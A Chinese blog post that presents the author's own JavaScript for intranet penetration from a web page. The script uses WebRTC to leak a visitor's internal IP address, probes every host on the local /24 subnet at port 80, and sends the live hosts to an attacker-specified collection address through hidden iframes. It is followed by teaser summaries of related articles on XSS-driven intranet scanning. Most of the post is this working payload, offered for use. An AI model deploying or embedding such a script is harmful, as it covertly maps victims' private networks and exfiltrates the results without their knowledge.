資訊專欄INFORMATION COLUMN
摘要:使用的屬性來發(fā)送數(shù)據(jù)內(nèi)容接受的地址接受內(nèi)網(wǎng)的參數(shù)接受內(nèi)網(wǎng)開放端口的參數(shù)如果想獲取真實(shí)的外網(wǎng),請把下一行改為遍歷內(nèi)網(wǎng)及端口,這里只寫了端口,多個(gè)端口,速度將會(huì)的非常慢。
var ip_arr = [];
var TagName = document.getElementsByTagName("body")[0];
function form_ip(ip,port){ //使用iframe的src屬性來發(fā)送ip、port數(shù)據(jù)內(nèi)容
var iframe = document.createElement("iframe");
iframe.setAttribute("src","接受的地址?接受內(nèi)網(wǎng)ip的參數(shù)=" + ip + "&接受內(nèi)網(wǎng)開放端口的參數(shù)=" + port);
iframe.setAttribute("style","display:none")
TagName.appendChild(iframe);
}
function getIPs(callback){
var ip_dups = {};
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
var servers = undefined;
if(window.webkitRTCPeerConnection)
//如果想獲取真實(shí)的外網(wǎng)IP,請把下一行改為servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
servers = {iceServers: []};
var pc = new RTCPeerConnection(servers, mediaConstraints);
pc.onicecandidate = function(ice){
if(ice.candidate){
var ip_regex = /([0-9]{1,3}(.[0-9]{1,3}){3})/
var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;
}
};
pc.createDataChannel("");
pc.createOffer(function(result){
pc.setLocalDescription(result, function(){});
}, function(){});
}
getIPs(function(ip){ //遍歷內(nèi)網(wǎng)ip及80端口,這里只寫了80端口,多個(gè)端口,速度將會(huì)的非常慢。
ip = ip.split(".");
ip.pop();
ip = ip.join(".");
for(var i = 1;i<=255;i++){
var script = document.createElement("script");
var ip_url = ip + "." + i + ":80";
script.setAttribute("src","http://" + ip_url);
script.setAttribute("onload","form_ip("" + ip + "." + i + "","80")");
TagName.appendChild(script);
}
});
雖然WebRTC已經(jīng)不是什么新技術(shù)了,用JavaScript進(jìn)行內(nèi)網(wǎng)滲透,網(wǎng)上也有說明,但是都沒怎么放出代碼。這里就就放出我自己的寫的。getIPs(function(ip){...} 效率不怎么高,如有更高者可以在下面給出。
文章版權(quán)歸作者所有,未經(jīng)允許請勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。
轉(zhuǎn)載請注明本文地址:http://m.specialneedsforspecialkids.com/yun/85734.html
摘要:為了使連接起作用,對(duì)等方必須獲取元數(shù)據(jù)的本地媒體條件例如,分辨率和編解碼器功能,并收集應(yīng)用程序主機(jī)的可能網(wǎng)絡(luò)地址,用于來回傳遞這些關(guān)鍵信息的信令機(jī)制并未內(nèi)置到中。所有特定于多媒體的元數(shù)據(jù)都使用協(xié)議傳遞。 這是專門探索 JavaScript 及其所構(gòu)建的組件的系列文章的第 18 篇。 想閱讀更多優(yōu)質(zhì)文章請猛戳GitHub博客,一年百來篇優(yōu)質(zhì)文章等著你! 如果你錯(cuò)過了前面的章節(jié),可以在這里...
摘要:探測端口開放原理就是向目標(biāo)發(fā)送請求,看是否有回應(yīng)。端口判定為不通。掃描批量目標(biāo)掃描批量目標(biāo)使用的并發(fā)隊(duì)列功能,去執(zhí)行的執(zhí)行單個(gè)任務(wù),在掃描前做了一些額外的工作把瀏覽器屏蔽的端口過濾掉了,收到的狀態(tài)就是。 0×00 前言 前兩天 freebuf上的的XSS到內(nèi)網(wǎng)的公開課很受啟發(fā),從一個(gè)頁面到局域網(wǎng),威力著實(shí)增強(qiáng)不少 公開課上檢測內(nèi)網(wǎng) IP 實(shí)現(xiàn)方式用的是 img 標(biāo)簽,加載網(wǎng)站的 fav...
摘要:探測端口開放原理就是向目標(biāo)發(fā)送請求,看是否有回應(yīng)。端口判定為不通。掃描批量目標(biāo)掃描批量目標(biāo)使用的并發(fā)隊(duì)列功能,去執(zhí)行的執(zhí)行單個(gè)任務(wù),在掃描前做了一些額外的工作把瀏覽器屏蔽的端口過濾掉了,收到的狀態(tài)就是。 0×00 前言 前兩天 freebuf上的的XSS到內(nèi)網(wǎng)的公開課很受啟發(fā),從一個(gè)頁面到局域網(wǎng),威力著實(shí)增強(qiáng)不少 公開課上檢測內(nèi)網(wǎng) IP 實(shí)現(xiàn)方式用的是 img 標(biāo)簽,加載網(wǎng)站的 fav...
閱讀 1452·2021-11-25 09:43
閱讀 2593·2021-09-24 10:30
閱讀 3668·2021-09-06 15:02
閱讀 3605·2019-08-30 15:55
閱讀 3307·2019-08-30 15:53
閱讀 1702·2019-08-30 15:52
閱讀 2148·2019-08-30 14:21
閱讀 2018·2019-08-30 13:55
